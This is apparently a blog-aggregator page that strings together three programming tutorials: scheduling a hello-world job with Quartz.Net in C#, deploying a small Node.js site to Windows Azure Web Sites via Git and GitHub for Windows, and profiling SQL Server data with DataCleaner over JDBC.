    In this blog post I’ll be covering, 01: A few things to consider before you should schedule a Job using Quartz.Net 02: Setting up your solution to use Quartz.Net API 03: Quartz.Net configuration 04: Writing & scheduling a hello world job with Quartz.Net If you are new to Quartz.Net I would recommend going through, A brief introduction to Quartz.net Walkthrough of Installing & Testing Quartz.Net as a Windows Service A few things to consider before you should schedule a Job using Quartz.Net - An instance of the scheduler service - A trigger - And last but not the least a job For example, if I wanted to schedule a script to run on the server, I should be jotting down answers to the below questions, a. Considering there are multiple machines set up with Quartz.Net windows service, how can I choose the instance of Quartz.Net where I want my script to be run b. What will trigger the execution of the job c. How often do I want the job to run d. Do I want the job to run right away or start after a delay or may be have the job start at a specific time e. What will happen to my job if Quartz.Net windows service is reset f. Do I want multiple instances of this job to run concurrently g. Can I pass parameters to the job being executed by Quartz.Net windows service Setting up your solution to use Quartz.Net API 1. Create a new C# Console Application project and call it “HelloWorldQuartzDotNet” and add a reference to Quartz.Net.dll. I use the NuGet Package Manager to add the reference. This can be done by right clicking references and choosing Manage NuGet packages, from the Nuget Package Manager choose Online from the left panel and in the search box on the right search for Quartz.Net. Click Install on the package “Quartz” (Screen shot below). 2. Right click the project and choose Add New Item. Add a new Interface and call it ‘IScheduledJob.cs’. Mark the Interface public and add the signature for Run. Your interface should look like below. namespace HelloWorldQuartzDotNet { public interface IScheduledJob { void Run(); } }   3. Right click the project and choose Add new Item. Add a class and call it ‘Scheduled Job’. Use this class to implement the interface ‘IscheduledJob.cs’. Look at the pseudo code in the implementation of the Run method. using System; namespace HelloWorldQuartzDotNet { class ScheduledJob : IScheduledJob { public void Run() { // Get an instance of the Quartz.Net scheduler // Define the Job to be scheduled // Associate a trigger with the Job // Assign the Job to the scheduler throw new NotImplementedException(); } } }   I’ll get into the implementation in more detail, but let’s look at the minimal configuration a sample configuration file for Quartz.Net service to work. Quartz.Net configuration In the App.Config file copy the below configuration <?xml version="1.0" encoding="utf-8" ?> <configuration> <configSections> <section name="quartz" type="System.Configuration.NameValueSectionHandler, System, Version=1.0.5000.0,Culture=neutral, PublicKeyToken=b77a5c561934e089" /> </configSections> <quartz> <add key="quartz.scheduler.instanceName" value="ServerScheduler" /> <add key="quartz.threadPool.type" value="Quartz.Simpl.SimpleThreadPool, Quartz" /> <add key="quartz.threadPool.threadCount" value="10" /> <add key="quartz.threadPool.threadPriority" value="2" /> <add key="quartz.jobStore.misfireThreshold" value="60000" /> <add key="quartz.jobStore.type" value="Quartz.Simpl.RAMJobStore, Quartz" /> </quartz> </configuration>   As you can see in the configuration above, I have included the instance name of the quartz scheduler, the thread pool type, count and priority, the job store type has been defined as RAM. You have the option of configuring that to ADO.NET JOB store. More details here. Writing & scheduling a hello world job with Quartz.Net Once fully implemented the ScheduleJob.cs class should look like below. I’ll walk you through the details of the implementation… - GetScheduler() uses the name of the quartz.net and listens on localhost port 555 to try and connect to the quartz.net windows service. - Run() an attempt is made to start the scheduler in case it is in standby mode - I have defined a job “WriteHelloToConsole” (that’s the name of the job), this job belongs to the group “IT”. Think of group as a logical grouping feature. It helps you bucket jobs into groups. Quartz.Net gives you the ability to pause or delete all jobs in a group (We’ll look at that in some of the future posts). I have requested for recovery of this job in case the quartz.net service fails over to the other node in the cluster. The jobType is “HelloWorldJob”. This is the class that would be called to execute the job. More details on this below… - I have defined a trigger for my job. I have called the trigger “WriteHelloToConsole”. The Trigger works on the cron schedule “0 0/1 * 1/1 * ? *” which means fire the job once every minute. I would recommend that you look at www.cronmaker.com a free and great website to build and parse cron expressions. The trigger has a priority 1. So, if two jobs are run at the same time, this trigger will have high priority and will be run first. - Use the Job and Trigger to schedule the job. This method returns a datetime offeset. It is possible to see the next fire time for the job from this variable. using System.Collections.Specialized; using System.Configuration; using Quartz; using System; using Quartz.Impl; namespace HelloWorldQuartzDotNet { class ScheduledJob : IScheduledJob { public void Run() { // Get an instance of the Quartz.Net scheduler var schd = GetScheduler(); // Start the scheduler if its in standby if (!schd.IsStarted) schd.Start(); // Define the Job to be scheduled var job = JobBuilder.Create<HelloWorldJob>() .WithIdentity("WriteHelloToConsole", "IT") .RequestRecovery() .Build(); // Associate a trigger with the Job var trigger = (ICronTrigger)TriggerBuilder.Create() .WithIdentity("WriteHelloToConsole", "IT") .WithCronSchedule("0 0/1 * 1/1 * ? *") // visit http://www.cronmaker.com/ Queues the job every minute .WithPriority(1) .Build(); // Assign the Job to the scheduler var schedule = schd.ScheduleJob(job, trigger); Console.WriteLine("Job '{0}' scheduled for '{1}'", "", schedule.ToString("r")); } // Get an instance of the Quartz.Net scheduler private static IScheduler GetScheduler() { try { var properties = new NameValueCollection(); properties["quartz.scheduler.instanceName"] = "ServerScheduler"; // set remoting expoter properties["quartz.scheduler.proxy"] = "true"; properties["quartz.scheduler.proxy.address"] = string.Format("tcp://{0}:{1}/{2}", "localhost", "555", "QuartzScheduler"); // Get a reference to the scheduler var sf = new StdSchedulerFactory(properties); return sf.GetScheduler(); } catch (Exception ex) { Console.WriteLine("Scheduler not available: '{0}'", ex.Message); throw; } } } }   The above highlighted values have been taken from the Quartz.config file, this file is available in the Quartz.net server installation directory. Implementation of my HelloWorldJob Class below. The HelloWorldJob class gets called to execute the job “WriteHelloToConsole” using the once every minute trigger set up for this job. The HelloWorldJob is a class that implements the interface IJob. I’ll walk you through the details of the implementation… - context is passed to the method execute by the quartz.net scheduler service. This has everything you need to pull out the job, trigger specific information. - for example. I have pulled out the value of the jobKey name, the fire time and next fire time. using Quartz; using System; namespace HelloWorldQuartzDotNet { class HelloWorldJob : IJob { public void Execute(IJobExecutionContext context) { try { Console.WriteLine("Job {0} fired @ {1} next scheduled for {2}", context.JobDetail.Key, context.FireTimeUtc.Value.ToString("r"), context.NextFireTimeUtc.Value.ToString("r")); Console.WriteLine("Hello World!"); } catch (Exception ex) { Console.WriteLine("Failed: {0}", ex.Message); } } } }   I’ll add a call to call the scheduler in the Main method in Program.cs using System; using System.Threading; namespace HelloWorldQuartzDotNet { class Program { static void Main(string[] args) { try { var sj = new ScheduledJob(); sj.Run(); Thread.Sleep(10000 * 10000); } catch (Exception ex) { Console.WriteLine("Failed: {0}", ex.Message); } } } }   This was third in the series of posts on enterprise scheduling using Quartz.net, in the next post I’ll be covering how to pass parameters to the scheduled task scheduled on Quartz.net windows service. Thank you for taking the time out and reading this blog post. If you enjoyed the post, remember to subscribe to http://feeds.feedburner.com/TarunArora. Stay tuned!

    Read the article

  • Building and Deploying Windows Azure Web Sites using Git and GitHub for Windows

    - by shiju
    Microsoft Windows Azure team has released a new version of Windows Azure which is providing many excellent features. The new Windows Azure provides Web Sites which allows you to deploy up to 10 web sites  for free in a multitenant shared environment and you can easily upgrade this web site to a private, dedicated virtual server when the traffic is grows. The Meet Windows Azure Fact Sheet provides the following information about a Windows Azure Web Site: Windows Azure Web Sites enable developers to easily build and deploy websites with support for multiple frameworks and popular open source applications, including ASP.NET, PHP and Node.js. With just a few clicks, developers can take advantage of Windows Azure’s global scale without having to worry about operations, servers or infrastructure. It is easy to deploy existing sites, if they run on Internet Information Services (IIS) 7, or to build new sites, with a free offer of 10 websites upon signup, with the ability to scale up as needed with reserved instances. Windows Azure Web Sites includes support for the following: Multiple frameworks including ASP.NET, PHP and Node.js Popular open source software apps including WordPress, Joomla!, Drupal, Umbraco and DotNetNuke Windows Azure SQL Database and MySQL databases Multiple types of developer tools and protocols including Visual Studio, Git, FTP, Visual Studio Team Foundation Services and Microsoft WebMatrix Signup to Windows and Enable Azure Web Sites You can signup for a 90 days free trial account in Windows Azure from here. After creating an account in Windows Azure, go to https://account.windowsazure.com/ , and select to preview features to view the available previews. In the Web Sites section of the preview features, click “try it now” which will enables the web sites feature Create Web Site in Windows Azure To create a web sites, login to the Windows Azure portal, and select Web Sites from and click New icon from the left corner  Click WEB SITE, QUICK CREATE and put values for URL and REGION dropdown. You can see the all web sites from the dashboard of the Windows Azure portal Set up Git Publishing Select your web site from the dashboard, and select Set up Git publishing To enable Git publishing , you must give user name and password which will initialize a Git repository Clone Git Repository We can use GitHub for Windows to publish apps to non-GitHub repositories which is well explained by Phil Haack on his blog post. Here we are going to deploy the web site using GitHub for Windows. Let’s clone a Git repository using the Git Url which will be getting from the Windows Azure portal. Let’s copy the Git url and execute the “git clone” with the git url. You can use the Git Shell provided by GitHub for Windows. To get it, right on the GitHub for Windows, and select open shell here as shown in the below picture. When executing the Git Clone command, it will ask for a password where you have to give password which specified in the Windows Azure portal. After cloning the GIT repository, you can drag and drop the local Git repository folder to GitHub for Windows GUI. This will automatically add the Windows Azure Web Site repository onto GitHub for Windows where you can commit your changes and publish your web sites to Windows Azure. Publish the Web Site using GitHub for Windows We can add multiple framework level files including ASP.NET, PHP and Node.js, to the local repository folder can easily publish to Windows Azure from GitHub for Windows GUI. For this demo, let me just add a simple Node.js file named Server.js which handles few request handlers. 1: var http = require('http'); 2: var port=process.env.PORT; 3: var querystring = require('querystring'); 4: var utils = require('util'); 5: var url = require("url"); 6:   7: var server = http.createServer(function(req, res) { 8: switch (req.url) { //checking the request url 9: case '/': 10: homePageHandler (req, res); //handler for home page 11: break; 12: case '/register': 13: registerFormHandler (req, res);//hamdler for register 14: break; 15: default: 16: nofoundHandler (req, res);// handler for 404 not found 17: break; 18: } 19: }); 20: server.listen(port); 21: //function to display the html form 22: function homePageHandler (req, res) { 23: console.log('Request handler home was called.'); 24: res.writeHead(200, {'Content-Type': 'text/html'}); 25: var body = '<html>'+ 26: '<head>'+ 27: '<meta http-equiv="Content-Type" content="text/html; '+ 28: 'charset=UTF-8" />'+ 29: '</head>'+ 30: '<body>'+ 31: '<form action="/register" method="post">'+ 32: 'Name:<input type=text value="" name="name" size=15></br>'+ 33: 'Email:<input type=text value="" name="email" size=15></br>'+ 34: '<input type="submit" value="Submit" />'+ 35: '</form>'+ 36: '</body>'+ 37: '</html>'; 38: //response content 39: res.end(body); 40: } 41: //handler for Post request 42: function registerFormHandler (req, res) { 43: console.log('Request handler register was called.'); 44: var pathname = url.parse(req.url).pathname; 45: console.log("Request for " + pathname + " received."); 46: var postData = ""; 47: req.on('data', function(chunk) { 48: // append the current chunk of data to the postData variable 49: postData += chunk.toString(); 50: }); 51: req.on('end', function() { 52: // doing something with the posted data 53: res.writeHead(200, "OK", {'Content-Type': 'text/html'}); 54: // parse the posted data 55: var decodedBody = querystring.parse(postData); 56: // output the decoded data to the HTTP response 57: res.write('<html><head><title>Post data</title></head><body><pre>'); 58: res.write(utils.inspect(decodedBody)); 59: res.write('</pre></body></html>'); 60: res.end(); 61: }); 62: } 63: //Error handler for 404 no found 64: function nofoundHandler(req, res) { 65: console.log('Request handler nofound was called.'); 66: res.writeHead(404, {'Content-Type': 'text/plain'}); 67: res.end('404 Error - Request handler not found'); 68: } .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } If there is any change in the local repository folder, GitHub for Windows will automatically detect the changes. In the above step, we have just added a Server.js file so that GitHub for Windows will detect the changes. Let’s commit the changes to the local repository before publishing the web site to Windows Azure. After committed the all changes, you can click publish button which will publish the all changes to Windows Azure repository. The following screen shot shows deployment history from the Windows Azure portal.   GitHub for Windows is providing a sync button which can use for synchronizing between local repository and Windows Azure repository after making any commit on the local repository after any changes. Our web site is running after the deployment using Git Summary Windows Azure Web Sites lets the developers to easily build and deploy websites with support for multiple framework including ASP.NET, PHP and Node.js and can easily deploy the Web Sites using Visual Studio, Git, FTP, Visual Studio Team Foundation Services and Microsoft WebMatrix. In this demo, we have deployed a Node.js Web Site to Windows Azure using Git. We can use GitHub for Windows to publish apps to non-GitHub repositories and can use to publish Web SItes to Windows Azure.

    Read the article

  • Data Profiling without SSIS

    Strangely enough for a predominantly SSIS blog, this post is all about how to perform data profiling without using SSIS. Whilst the Data Profiling Task is a worthy addition, there are a couple of limitations I’ve encountered of late. The first is that it requires SQL Server 2008, and not everyone is there yet. The second is that it can only target SQL Server 2005 and above. What about older systems, which are the ones that we probably need to investigate the most, or other vendor databases such as Oracle? With these limitations in mind I did some searching to find a quick and easy alternative to help me perform some data profiling for a project I was working on recently. I only had SQL Server 2005 available, and anyway most of my target source systems were Oracle, and of course I had short timescales. I looked at several options. Some never got beyond the download stage, they failed to install or just did not run, and others provided less than I could have produced myself by spending 2 minutes writing some basic SQL queries. In the end I settled on an open source product called DataCleaner. To quote from their website: DataCleaner is an Open Source application for profiling, validating and comparing data. These activities help you administer and monitor your data quality in order to ensure that your data is useful and applicable to your business situation. DataCleaner is the free alternative to software for master data management (MDM) methodologies, data warehousing (DW) projects, statistical research, preparation for extract-transform-load (ETL) activities and more. DataCleaner is developed in Java and licensed under LGPL. As quoted above it claims to support profiling, validating and comparing data, but I didn’t really get past the profiling functions, so won’t comment on the other two. The profiling whilst not prefect certainly saved some time compared to the limited alternatives. The ability to profile heterogeneous data sources is a big advantage over the SSIS option, and I found it overall quite easy to use and performance was good. I could see it struggling at times, but actually for what it does I was impressed. It had some data type niggles with Oracle, and some metrics seem a little strange, although thankfully they were easy to augment with some SQL queries to ensure a consistent picture. The report export options didn’t do it for me, but copy and paste with a bit of Excel magic was sufficient. One initial point for me personally is that I have had limited exposure to things of the Java persuasion and whilst I normally get by fine, sometimes the simplest things can throw me. For example installing a JDBC driver, why do I have to copy files to make it all work, has nobody ever heard of an MSI? In case there are other people out there like me who have become totally indoctrinated with the Microsoft software paradigm, I’ve written a quick start guide that details every step required. Steps 1- 5 are the key ones, the rest is really an excuse for some screenshots to show you the tool. Quick Start Guide Step 1  - Download Data Cleaner. The Microsoft Windows zipped exe option, and I chose the latest stable build, currently DataCleaner 1.5.3 (final). Extract the files to a suitable location. Step 2 - Download Java. If you try and run datacleaner.exe without Java it will warn you, and then open your default browser and take you to the Java download site. Follow the installation instructions from there, normally just click Download Java a couple of times and you’re done. Step 3 - Download Microsoft SQL Server JDBC Driver. You may have SQL Server installed, but you won’t have a JDBC driver. Version 3.0 is the latest as of April 2010. There is no real installer, we are in the Java world here, but run the exe you downloaded to extract the files. The default Unzip to folder is not much help, so try a fully qualified path such as C:\Program Files\Microsoft SQL Server JDBC Driver 3.0\ to ensure you can find the files afterwards. Step 4 - If you wish to use Windows Authentication to connect to your SQL Server then first we need to copy a file so that Data Cleaner can find it. Browse to the JDBC extract location from Step 3 and drill down to the file sqljdbc_auth.dll. You will have to choose the correct directory for your processor architecture. e.g. C:\Program Files\Microsoft SQL Server JDBC Driver 3.0\sqljdbc_3.0\enu\auth\x86\sqljdbc_auth.dll. Now copy this file to the Data Cleaner extract folder you chose in Step 1. An alternative method is to edit datacleaner.cmd in the data cleaner extract folder as detailed in this data cleaner wiki topic, but I find copying the file simpler. Step 5 – Now lets run Data Cleaner, just run datacleaner.exe from the extract folder you chose in Step 1. Step 6 – Complete or skip the registration screen, and ignore the task window for now. In the main window click settings. Step 7 – In the Settings dialog, select the Database drivers tab, then click Register database driver and select the Local JAR file option. Step 8 – Browse to the JDBC driver extract location from Step 3 and drill down to select sqljdbc4.jar. e.g. C:\Program Files\Microsoft SQL Server JDBC Driver 3.0\sqljdbc_3.0\enu\sqljdbc4.jar Step 9 – Select the Database driver class as com.microsoft.sqlserver.jdbc.SQLServerDriver, and then click the Test and Save database driver button. Step 10 - You should be back at the Settings dialog with a the list of drivers that includes SQL Server. Just click Save Settings to persist all your hard work. Step 11 – Now we can start to profile some data. In the main Data Cleaner window click New Task, and then Profile from the task window. Step 12 – In the Profile window click Open Database Step 13 – Now choose the SQL Server connection string option. Selecting a connection string gives us a template like jdbc:sqlserver://<hostname>:1433;databaseName=<database>, but obviously it requires some details to be entered for example  jdbc:sqlserver://localhost:1433;databaseName=SQLBits. This will connect to the database called SQLBits on my local machine. The port may also have to be changed if using such as when you have a multiple instances of SQL Server running. If using SQL Server Authentication enter a username and password as required and then click Connect to database. You can use Window Authentication, just add integratedSecurity=true to the end of your connection string. e.g jdbc:sqlserver://localhost:1433;databaseName=SQLBits;integratedSecurity=true.  If you didn’t complete Step 4 above you will need to do so now and restart Data Cleaner before it will work. Manually setting the connection string is fine, but creating a named connection makes more sense if you will be spending any length of time profiling a specific database. As highlighted in the left-hand screen-shot, at the bottom of the dialog it includes partial instructions on how to create named connections. In the folder shown C:\Users\<Username>\.datacleaner\1.5.3, open the datacleaner-config.xml file in your editor of choice add your own details. You’ll see a sample connection in the file already, just add yours following the same pattern. e.g. <!-- Darren's Named Connections --> <bean class="dk.eobjects.datacleaner.gui.model.NamedConnection"> <property name="name" value="SQLBits Local Connection" /> <property name="driverClass" value="com.microsoft.sqlserver.jdbc.SQLServerDriver" /> <property name="connectionString" value="jdbc:sqlserver://localhost:1433;databaseName=SQLBits;integratedSecurity=true" /> <property name="tableTypes"> <list> <value>TABLE</value> <value>VIEW</value> </list> </property> </bean> Step 14 – Once back at the Profile window, you should now see your schemas, tables and/or views listed down the left hand side. Browse this tree and double-click a table to select it for profiling. You can then click Add profile, and choose some profiling options, before finally clicking Run profiling. You can see below a sample output for three of the most common profiles, click the image for full size.   I hope this has given you a taster for DataCleaner, and should help you get up and running pretty quickly.

    Read the article

< Previous Page | 208 209 210 211 212 213 214 215 216 217 218 219  | Next Page >